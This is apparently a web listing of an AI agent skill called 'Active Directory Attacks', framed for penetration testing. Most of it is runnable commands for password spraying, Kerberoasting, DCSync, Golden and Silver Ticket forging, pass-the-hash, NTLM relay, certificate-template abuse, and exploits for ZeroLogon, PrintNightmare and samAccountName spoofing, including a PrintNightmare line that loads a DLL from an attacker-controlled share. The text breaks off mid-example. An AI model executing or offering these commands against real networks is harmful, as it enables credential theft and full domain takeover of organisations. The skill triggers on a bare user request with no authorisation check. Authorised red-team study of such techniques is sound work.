Active Directory Attacks
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
What this skill does
# Active Directory Attacks ## Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. ## Inputs/Prerequisites - Kali Linux or Windows attack platform - Domain user credentials (for most attacks) - Network access to Domain Controller - Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec ## Outputs/Deliverables - Domain enumeration data - Extracted credentials and hashes - Kerberos tickets for impersonation - Domain Administrator access - Persistent access mechanisms --- ## Essential Tools | Tool | Purpose | |------|---------| | BloodHound | AD attack path visualization | | Impacket | Python AD attack tools | | Mimikatz | Credential extraction | | Rubeus | Kerberos attacks | | CrackMapExec | Network exploitation | | PowerView | AD enumeration | | Responder | LLMNR/NBT-NS poisoning | --- ## Core Workflow ### Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes): ```bash # Detect clock skew nmap -sT 10.10.10.10 -p445 --script smb2-time # Fix clock on Linux sudo date -s "14 APR 2024 18:25:16" # Fix clock on Windows net time /domain /set # Fake clock without changing system time faketime -f '+8h' <command> ``` ### Step 2: AD Reconnaissance with BloodHound ```bash # Start BloodHound neo4j console bloodhound --no-sandbox # Collect data with SharpHound .\SharpHound.exe -c All .\SharpHound.exe -c All --ldapusername user --ldappassword pass # Python collector (from Linux) bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all ``` ### Step 3: PowerView Enumeration ```powershell # Get domain info Get-NetDomain Get-DomainSID Get-NetDomainController # Enumerate users Get-NetUser Get-NetUser -SamAccountName targetuser Get-UserProperty -Properties pwdlastset # Enumerate groups Get-NetGroupMember -GroupName "Domain Admins" Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member # Find local admin access Find-LocalAdminAccess -Verbose # User hunting Invoke-UserHunter Invoke-UserHunter -Stealth ``` --- ## Credential Attacks ### Password Spraying ```bash # Using kerbrute ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123 # Using CrackMapExec crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success ``` ### Kerberoasting Extract service account TGS tickets and crack offline: ```bash # Impacket GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt # Rubeus .\Rubeus.exe kerberoast /outfile:hashes.txt # CrackMapExec crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt # Crack with hashcat hashcat -m 13100 hashes.txt rockyou.txt ``` ### AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication": ```bash # Impacket GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat # Rubeus .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt # Crack with hashcat hashcat -m 18200 hashes.txt rockyou.txt ``` ### DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights): ```bash # Impacket secretsdump.py domain.local/admin:[email protected] -just-dc-user krbtgt # Mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator ``` --- ## Kerberos Ticket Attacks ### Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user: ```powershell # Get krbtgt hash via DCSync first # Mimikatz - Create Golden Ticket kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt # Impacket ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass domain.local/[email protected] ``` ### Silver Ticket Forge TGS for specific service: ```powershell # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt ``` ### Pass-the-Hash ```bash # Impacket psexec.py domain.local/[email protected] -hashes :NTHASH wmiexec.py domain.local/[email protected] -hashes :NTHASH smbexec.py domain.local/[email protected] -hashes :NTHASH # CrackMapExec crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth ``` ### OverPass-the-Hash Convert NTLM hash to Kerberos ticket: ```bash # Impacket getTGT.py domain.local/user -hashes :NTHASH export KRB5CCNAME=user.ccache # Rubeus .\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt ``` --- ## NTLM Relay Attacks ### Responder + ntlmrelayx ```bash # Start Responder (disable SMB/HTTP for relay) responder -I eth0 -wrf # Start relay ntlmrelayx.py -tf targets.txt -smb2support # LDAP relay for delegation attack ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access ``` ### SMB Signing Check ```bash crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt ``` --- ## Certificate Services Attacks (AD CS) ### ESC1 - Misconfigured Templates ```bash # Find vulnerable templates certipy find -u [email protected] -p password -dc-ip 10.10.10.10 # Exploit ESC1 certipy req -u [email protected] -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn [email protected] # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 ``` ### ESC8 - Web Enrollment Relay ```bash ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController ``` --- ## Critical CVEs ### ZeroLogon (CVE-2020-1472) ```bash # Check vulnerability crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon # Exploit python3 cve-2020-1472-exploit.py DC01 10.10.10.10 # Extract hashes secretsdump.py -just-dc domain.local/DC01\[email protected] -no-pass # Restore password (important!) python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD ``` ### PrintNightmare (CVE-2021-1675) ```bash # Check for vulnerability rpcdump.py @10.10.10.10 | grep 'MS-RPRN' # Exploit (requires hosting malicious DLL) python3 CVE-2021-1675.py domain.local/user:[email protected] '\\attacker\share\evil.dll' ``` ### samAccountName Spoofing (CVE-2021-42278/42287) ```bash # Automated exploitation python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell ``` --- ## Quick Reference | Attack | Tool | Command | |--------|------|---------| | Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` | | AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` | | DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` | | Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` | | Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` | | Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` | --- ## Constraints **Must:** - Synchronize time with DC before Kerberos attacks - Have valid domain credentials for most attacks - Document all compromised accounts **Must Not:** - Lock out accounts with excessive password spraying - Modify production AD objects without approval - Leave Golden Tickets without documentation **Should:** - Run BloodHound for attack path discovery - Check for SMB signing before relay attacks - Verify patch levels for CVE exploitation --- ## Examples ### Example 1: Domain Compromise via Kerberoasting ```bash # 1. Find service accounts with SPNs GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 # 2. Request TGS tickets GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfi
Related in Ads & Marketing
ads
IncludedMulti-platform paid advertising audit and optimization skill. Analyzes Google, Meta, YouTube, LinkedIn, TikTok, Microsoft, and Apple Ads. 250+ checks with scoring, parallel agents, industry templates, and AI creative generation.
banana
IncludedAI image generation Creative Director powered by Google Gemini Nano Banana models. Use this skill for ANY request involving image creation, editing, visual asset production, or creative direction. Triggers on: generate an image, create a photo, edit this picture, design a logo, make a banner, visual for my anything, and all /banana commands. Handles text-to-image, image editing, multi-turn creative sessions, batch workflows, and brand presets.
rpg-migration-analyzer
IncludedAnalyzes legacy RPG (Report Program Generator) programs from AS/400 and IBM i systems for migration to modern Java applications. Extracts business logic from RPG III/IV/ILE source code, identifies data structures (D-specs), file operations (F-specs), program dependencies (CALLB/CALLP), and converts RPG constructs to Java equivalents. Generates migration reports, complexity estimates, and Java implementation strategies with POJO classes, JPA entities, and service methods. Use when modernizing AS/400 or IBM i legacy systems, analyzing RPG source files (.rpg, .rpgle, .RPGLE), converting RPG to Java, mapping data specifications to Java classes, planning legacy system migration, or when user mentions RPG analysis, Report Program Generator, RPG III/IV/ILE, AS/400 modernization, IBM i migration, packed decimal conversion, or mainframe application rewrite.
brand-library-architect
IncludedBuild a complete brand library for a product — visual asset render pipeline, brand documentation set (BRAND, COPY, MANIFESTO, BIOS, FAQ, GLOSSARY, TONE, PRICING), open-source convention files (README, CONTRIBUTING, SECURITY, CODE_OF_CONDUCT), and a self-contained press kit. This skill should be used when the user asks to "build a brand library / brand kit / press kit / brand assets" for a product, "set up a brand library workflow," "create a positioning manifesto plus visual identity," or any combination of brand documentation + visual asset pipeline. Apply phase-by-phase or run end-to-end. Templates are product-agnostic and use {{TOKEN}} placeholders the skill prompts the user to fill.
writing-tech-post
IncludedAuthors engineering blog posts end-to-end: launch deep-dives, incident postmortems, architecture migrations, performance case studies, tutorials, AI/agent system writeups, security disclosures, and research-to-product translations. Picks the correct archetype, plans the abstraction ladder, enforces an evidence cadence (diagrams, benchmarks, profiles, traces, code, ablations), tunes voice against publisher house styles (Datadog, Vercel, GitHub, AWS, Meta, Cloudflare, Jane Street), and runs a pre-publish gate for narrative momentum and disclosure ethics. Use when drafting a new engineering post, restructuring a draft that feels flat, deciding which evidence form belongs where, validating that depth and product context are balanced, or preparing a postmortem, migration, or performance narrative for external publication. Do not use for API reference documentation, README authoring, marketing copy, release notes, generic SEO content, ghost-written executive thought leadership, or non-engineering long-form essays.
blog-google
IncludedGoogle API integration for blog performance: PageSpeed Insights, CrUX Core Web Vitals with 25-week history, Search Console performance, URL Inspection, Indexing API, GA4 organic traffic, NLP entity analysis for E-E-A-T, YouTube video search for embedding, and Google Ads Keyword Planner. Progressive feature availability based on credential tier (API key, OAuth/service account, GA4, Ads). Shares config with claude-seo at ~/.config/claude-seo/google-api.json. Use when user says "google data", "page speed", "core web vitals", "search console", "indexation", "GA4", "keyword research", "nlp entities", "blog performance", "youtube search", "google api setup".